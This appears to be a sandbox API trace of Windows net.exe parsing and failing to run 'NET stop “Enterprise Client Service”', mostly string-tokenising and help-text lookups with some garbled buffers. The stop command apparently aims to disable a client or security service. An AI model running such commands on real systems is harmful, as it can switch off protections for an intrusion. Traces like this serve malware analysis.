0x0 [0120.070] wcstok (in: _String="\r\nSESSION: SESSIONS, SESS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSESSION", _Context=0x3d6) returned="\r\nSESSION" [0120.070] wcsspn (_String="\r\nSESSION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0120.070] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESSIONS" [0120.070] wcsspn (_String=" SESSIONS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0120.070] _wcsicmp (_String1="SESSIONS", _String2="stop") returned -15 [0120.070] _wcsicmp (_String1="SESSIONS", _String2="“Enterprise") returned -8105 [0120.070] _wcsicmp (_String1="SESSIONS", _String2="Client") returned 16 [0120.070] _wcsicmp (_String1="SESSIONS", _String2="Service”") returned 1 [0120.070] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESS" [0120.070] wcsspn (_String=" SESS", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0120.070] _wcsicmp (_String1="SESS", _String2="stop") returned -15 [0120.070] _wcsicmp (_String1="SESS", _String2="“Enterprise") returned -8105 [0120.070] _wcsicmp (_String1="SESS", _String2="Client") returned 16 [0120.070] _wcsicmp (_String1="SESS", _String2="Service”") returned 1 [0120.070] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0120.070] wcstok (in: _String="\r\nSTATISTICS: STATS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSTATISTICS", _Context=0x3d6) returned="\r\nSTATISTICS" [0120.070] wcsspn (_String="\r\nSTATISTICS", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0120.071] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" STATS" [0120.071] wcsspn (_String=" STATS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0120.071] _wcsicmp (_String1="STATS", _String2="stop") returned -14 [0120.071] _wcsicmp (_String1="STATS", _String2="“Enterprise") returned -8105 [0120.071] _wcsicmp (_String1="STATS", _String2="Client") returned 16 [0120.071] _wcsicmp (_String1="STATS", _String2="Service”") returned 15 [0120.071] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0120.071] wcstok (in: _String="\r\nUSER: USERS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nUSER", _Context=0x3d6) returned="\r\nUSER" [0120.071] wcsspn (_String="\r\nUSER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0120.071] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" USERS" [0120.071] wcsspn (_String=" USERS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0120.071] _wcsicmp (_String1="USERS", _String2="stop") returned 2 [0120.071] _wcsicmp (_String1="USERS", _String2="“Enterprise") returned -8103 [0120.071] _wcsicmp (_String1="USERS", _String2="Client") returned 18 [0120.071] _wcsicmp (_String1="USERS", _String2="Service”") returned 2 [0120.071] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0120.071] wcstok (in: _String="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nWORKSTATION", _Context=0x3d6) returned="\r\nWORKSTATION" [0120.071] wcsspn (_String="\r\nWORKSTATION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0120.071] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIRECTOR" [0120.071] wcsspn (_String=" REDIRECTOR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0120.071] _wcsicmp (_String1="REDIRECTOR", _String2="stop") returned -1 [0120.071] _wcsicmp (_String1="REDIRECTOR", _String2="“Enterprise") returned -8106 [0120.071] _wcsicmp (_String1="REDIRECTOR", _String2="Client") returned 15 [0120.071] _wcsicmp (_String1="REDIRECTOR", _String2="Service”") returned -1 [0120.071] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIR" [0120.071] wcsspn (_String=" REDIR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0120.071] _wcsicmp (_String1="REDIR", _String2="stop") returned -1 [0120.071] _wcsicmp (_String1="REDIR", _String2="“Enterprise") returned -8106 [0120.072] _wcsicmp (_String1="REDIR", _String2="Client") returned 15 [0120.072] _wcsicmp (_String1="REDIR", _String2="Service”") returned -1 [0120.072] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" RDR" [0120.072] wcsspn (_String=" RDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0120.072] _wcsicmp (_String1="RDR", _String2="stop") returned -1 [0120.072] _wcsicmp (_String1="RDR", _String2="“Enterprise") returned -8106 [0120.072] _wcsicmp (_String1="RDR", _String2="Client") returned 15 [0120.072] _wcsicmp (_String1="RDR", _String2="Service”") returned -1 [0120.072] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WORK" [0120.072] wcsspn (_String=" WORK", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0120.072] _wcsicmp (_String1="WORK", _String2="stop") returned 4 [0120.072] _wcsicmp (_String1="WORK", _String2="“Enterprise") returned -8101 [0120.072] _wcsicmp (_String1="WORK", _String2="Client") returned 20 [0120.072] _wcsicmp (_String1="WORK", _String2="Service”") returned 4 [0120.072] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WKSTA" [0120.072] wcsspn (_String=" WKSTA", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0120.072] _wcsicmp (_String1="WKSTA", _String2="stop") returned 4 [0120.072] _wcsicmp (_String1="WKSTA", _String2="“Enterprise") returned -8101 [0120.072] _wcsicmp (_String1="WKSTA", _String2="Client") returned 20 [0120.072] _wcsicmp (_String1="WKSTA", _String2="Service”") returned 4 [0120.072] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" PRDR" [0120.072] wcsspn (_String=" PRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0120.072] _wcsicmp (_String1="PRDR", _String2="stop") returned -3 [0120.072] _wcsicmp (_String1="PRDR", _String2="“Enterprise") returned -8108 [0120.072] _wcsicmp (_String1="PRDR", _String2="Client") returned 13 [0120.072] _wcsicmp (_String1="PRDR", _String2="Service”") returned -3 [0120.072] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" DEVRDR" [0120.072] wcsspn (_String=" DEVRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0120.073] _wcsicmp (_String1="DEVRDR", _String2="stop") returned -15 [0120.073] _wcsicmp (_String1="DEVRDR", _String2="“Enterprise") returned -8120 [0120.073] _wcsicmp (_String1="DEVRDR", _String2="Client") returned 1 [0120.073] _wcsicmp (_String1="DEVRDR", _String2="Service”") returned -15 [0120.073] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0120.073] wcstok (in: _String="\r\nSERVER: SVR, SRV", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSERVER", _Context=0x3d6) returned="\r\nSERVER" [0120.073] wcsspn (_String="\r\nSERVER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0120.073] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SVR" [0120.073] wcsspn (_String=" SVR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0120.073] _wcsicmp (_String1="SVR", _String2="stop") returned 2 [0120.073] _wcsicmp (_String1="SVR", _String2="“Enterprise") returned -8105 [0120.073] _wcsicmp (_String1="SVR", _String2="Client") returned 16 [0120.073] _wcsicmp (_String1="SVR", _String2="Service”") returned 17 [0120.073] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SRV" [0120.073] wcsspn (_String=" SRV", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0120.073] _wcsicmp (_String1="SRV", _String2="stop") returned -2 [0120.073] _wcsicmp (_String1="SRV", _String2="“Enterprise") returned -8105 [0120.073] _wcsicmp (_String1="SRV", _String2="Client") returned 16 [0120.073] _wcsicmp (_String1="SRV", _String2="Service”") returned 13 [0120.073] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0120.073] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc67, dwLanguageId=0x0, lpBuffer=0x18f608, nSize=0x0, Arguments=0x18f604 | out: lpBuffer="哈Lꔺ盹") returned 0x1c [0120.073] wcstok (in: _String="NAMES$\r\nSYNTAX$\r\nSERVICES$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="NAMES", _Context=0x3d6) returned="NAMES" [0120.073] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSYNTAX" [0120.073] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVICES" [0120.073] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0120.073] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0120.074] wcsspn (_String="NAMES", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0120.074] _wcsicmp (_String1="stop", _String2="NAMES") returned 5 [0120.074] wcsspn (_String="\r\nSYNTAX", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0120.074] _wcsicmp (_String1="stop", _String2="SYNTAX") returned -5 [0120.074] wcsspn (_String="\r\nSERVICES", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0120.074] _wcsicmp (_String1="stop", _String2="SERVICES") returned 15 [0120.074] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0120.074] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0120.075] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x111d, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The syntax of this command is:\r\n") returned 0x20 [0120.076] GetFileType (hFile=0x0) returned 0x0 [0120.076] LocalAlloc (uFlags=0x0, uBytes=0x40) returned 0x4c3ab8 [0120.076] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The syntax of this command is:\r\n", cchWideChar=32, lpMultiByteStr=0x4c3ab8, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The syntax of this command is:\r\n", lpUsedDefaultChar=0x0) returned 32 [0120.076] WriteFile (in: hFile=0x0, lpBuffer=0x4c3ab8, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18f5e8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18f5e8, lpOverlapped=0x0) returned 0 [0120.076] LocalFree (hMem=0x4c3ab8) returned 0x0 [0120.076] GetFileType (hFile=0x0) returned 0x0 [0120.076] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4c37b8 [0120.076] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4c37b8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nL", lpUsedDefaultChar=0x0) returned 2 [0120.076] WriteFile (in: hFile=0x0, lpBuffer=0x4c37b8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x18f5e8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18f5e8, lpOverlapped=0x0) returned 0 [0120.076] LocalFree (hMem=0x4c37b8) returned 0x0 [0120.076] wcscpy_s (in: _Destination=0x18f6a0, _SizeInWords=0x200, _Source="NET" | out: _Destination="NET") returned 0x0 [0120.076] wcsncat_s (in: _Destination="NET", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET ") returned 0x0 [0120.076] wcsncat_s (in: _Destination="NET ", _SizeInWords=0x200, _Source="stop", _MaxCount=0xffffffff | out: _Destination="NET stop") returned 0x0 [0120.076] wcsncat_s (in: _Destination="NET stop", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ") returned 0x0 [0120.076] wcsncat_s (in: _Destination="NET stop ", _SizeInWords=0x200, _Source="“Enterprise", _MaxCount=0xffffffff | out: _Destination="NET stop “Enterprise") returned 0x0 [0120.077] wcsncat_s (in: _Destination="NET stop “Enterprise", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop “Enterprise ") returned 0x0 [0120.077] wcsncat_s (in: _Destination="NET stop “Enterprise ", _SizeInWords=0x200, _Source="Client", _MaxCount=0xffffffff | out: _Destination="NET stop “Enterprise Client") returned 0x0 [0120.077] wcsncat_s (in: _Destination="NET stop “Enterprise Client", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop “Enterprise Client ") returned 0x0 [0120.077] wcsncat_s (in: _Destination="NET stop “Enterprise Client ", _SizeInWords=0x200, _Source="Service”", _MaxCount=0xffffffff | out: _Destination="NET stop “Enterprise Client Service”") returned 0x0 [0120.077] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L댸9\x18Ѱ9") returned 0xad [0120.077] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{minutes", _MaxCount=0x24) returned 18 [0120.077] LocalFree (hMem=0x4c5510) returned 0x0 [0120.077] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x2e [0120.077] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="NET COMPUTER\r\n\\\\computername {/ADD |", _MaxCount=0x24) returned 16 [0120.077] LocalFree (hMem=0x4c5510) returned 0x0 [0120.077] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x7d [0120.077] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="NET CONFIG SERVER\r\n[/AUTODISCONNECT:", _MaxCount=0x24) returned 16 [0120.077] LocalFree (hMem=0x4c5510) returned 0x0 [0120.077] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x26 [0120.077] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="NET CONFIG\r\n[SERVER | WORKSTATION]\r\n", _MaxCount=0x24) returned 16 [0120.077] LocalFree (hMem=0x4c5510) returned 0x0 [0120.077] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x19 [0120.077] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x24) returned 16 [0120.077] LocalFree (hMem=0x4c5510) returned 0x0 [0120.077] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x1b [0120.077] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x24) returned 13 [0120.077] LocalFree (hMem=0x4c5510) returned 0x0 [0120.077] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0xbe [0120.077] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="NET GROUP\r\n[groupname [/COMMENT:\"tex", _MaxCount=0x24) returned 12 [0120.077] LocalFree (hMem=0x4c5510) returned 0x0 [0120.078] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x33 [0120.078] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="NET HELP\r\ncommand\r\n -or-\r\nNET co", _MaxCount=0x24) returned 11 [0120.078] LocalFree (hMem=0x4c5510) returned 0x0 [0120.078] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x19 [0120.078] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x24) returned 11 [0120.078] LocalFree (hMem=0x4c5510) returned 0x0 [0120.078] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0xc1 [0120.078] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="NET LOCALGROUP\r\n[groupname [/COMMENT", _MaxCount=0x24) returned 7 [0120.078] LocalFree (hMem=0x4c5510) returned 0x0 [0120.078] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x16 [0120.078] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x24) returned 3 [0120.078] LocalFree (hMem=0x4c5510) returned 0x0 [0120.078] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x33 [0120.078] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="NET SESSION\r\n[\\\\computername] [/DELE", _MaxCount=0x24) returned 15 [0120.078] LocalFree (hMem=0x4c5510) returned 0x0 [0120.078] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x234 [0120.079] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="NET SHARE\r\nsharename\r\n shar", _MaxCount=0x24) returned 12 [0120.079] LocalFree (hMem=0x4c5510) returned 0x0 [0120.079] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x13 [0120.079] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="NET START BROWSER\r\n", _MaxCount=0x24) returned 14 [0120.079] LocalFree (hMem=0x4c5510) returned 0x0 [0120.079] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x14 [0120.079] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x24) returned 14 [0120.079] LocalFree (hMem=0x4c5510) returned 0x0 [0120.079] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x14 [0120.079] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="NET START EVENTLOG\r\n", _MaxCount=0x24) returned 14 [0120.079] LocalFree (hMem=0x4c5510) returned 0x0 [0120.079] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x15 [0120.079] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="NET START MESSENGER\r\n", _MaxCount=0x24) returned 14 [0120.079] LocalFree (hMem=0x4c5510) returned 0x0 [0120.079] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x15 [0120.079] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="NET START NET LOGON\r\n", _MaxCount=0x24) returned 14 [0120.079] LocalFree (hMem=0x4c5510) returned 0x0 [0120.079] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x16 [0120.079] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x24) returned 14 [0120.079] LocalFree (hMem=0x4c5510) returned 0x0 [0120.079] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x11 [0120.079] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="NET START RPCSS\r\n", _MaxCount=0x24) returned 14 [0120.079] LocalFree (hMem=0x4c5510) returned 0x0 [0120.079] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x14 [0120.079] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="NET START SCHEDULE\r\n", _MaxCount=0x24) returned 14 [0120.079] LocalFree (hMem=0x4c5510) returned 0x0 [0120.079] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x12 [0120.080] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="NET START SERVER\r\n", _MaxCount=0x24) returned 14 [0120.080] LocalFree (hMem=0x4c5510) returned 0x0 [0120.080] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0xf [0120.080] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="NET START UPS\r\n", _MaxCount=0x24) returned 14 [0120.080] LocalFree (hMem=0x4c5510) returned 0x0 [0120.080] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x17 [0120.080] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="NET START WORKSTATION\r\n", _MaxCount=0x24) returned 14 [0120.080] LocalFree (hMem=0x4c5510) returned 0x0 [0120.080] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x18 [0120.080] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x24) returned 14 [0120.080] LocalFree (hMem=0x4c5510) returned 0x0 [0120.080] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x2a [0120.080] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="NET STATISTICS\r\n[WORKSTATION | SERVE", _MaxCount=0x24) returned 14 [0120.080] LocalFree (hMem=0x4c5510) returned 0x0 [0120.080] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x15 [0120.080] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x24) returned 19 [0120.080] LocalFree (hMem=0x4c5510) returned 0x0 [0120.080] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x58 [0120.080] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="NET TIME\r\n\r\n[\\\\computername | /DOMAI", _MaxCount=0x24) returned -1 [0120.080] LocalFree (hMem=0x4c5510) returned 0x0 [0120.080] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x184 [0120.080] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="NET USE\r\n[devicename | *] [\\\\compute", _MaxCount=0x24) returned -2 [0120.080] LocalFree (hMem=0x4c5510) returned 0x0 [0120.080] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0xc7 [0120.080] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="NET USER\r\n[username [password | *] [", _MaxCount=0x24) returned -2 [0120.080] LocalFree (hMem=0x4c5510) returned 0x0 [0120.081] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x47 [0120.081] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="NET VIEW\r\n[\\\\computername [/CACHE] |", _MaxCount=0x24) returned -3 [0120.081] LocalFree (hMem=0x4c5510) returned 0x0 [0120.081] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0xc2 [0120.081] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="NET\r\n [ ACCOUNTS | COMPUTER | CON", _MaxCount=0x24) returned 19 [0120.081] LocalFree (hMem=0x4c5510) returned 0x0 [0120.081] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x319 [0120.081] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="SERVICES\r\nNET START can be used to s", _MaxCount=0x24) returned -5 